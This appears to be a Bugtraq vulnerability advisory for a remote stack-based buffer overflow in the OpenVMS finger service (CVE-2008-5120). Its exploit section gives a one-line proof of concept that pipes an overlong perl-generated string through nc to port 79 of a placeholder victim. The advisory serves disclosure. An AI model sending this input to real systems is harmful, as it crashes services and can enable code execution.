OpenVMS Finger Service Stack Based Buffer Overflow Vulnerability

Bugtraq ID:	30589
Class:	Boundary Condition Error
CVE:	CVE-2008-5120
Remote:	Yes
Local:	No
Published:	Aug 07 2008 12:00AM
Updated:	May 07 2015 05:25PM
Credit:	Shaun Colley from NGSSoftware
Vulnerable:	HP OpenVMS 8.3.Alpha HP OpenVMS 8.3 Integrity
Not Vulnerable:

OpenVMS Finger Service Stack Based Buffer Overflow Vulnerability

The finger service ('fingerd') on OpenVMS is prone to a stack-based buffer-overflow vulnerability because it fails to adequately bounds-check user-supplied input.

Attackers can exploit this issue to execute arbitrary code in the context of the affected application. Failed attempts will likely cause denial-of-service conditions.

We were not told which versions are affected. We will update this BID as more information emerges.

OpenVMS Finger Service Stack Based Buffer Overflow Vulnerability

The following command is sufficient to exploit this issue:

echo `perl -e 'print "a"x1000'` | nc -v victim.example.com 79

OpenVMS Finger Service Stack Based Buffer Overflow Vulnerability

Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].

OpenVMS Finger Service Stack Based Buffer Overflow Vulnerability

References:

• OpenVMS Home Page (HP)
  
• OpenVMS fingerd remote stack overflow (Shaun Colley )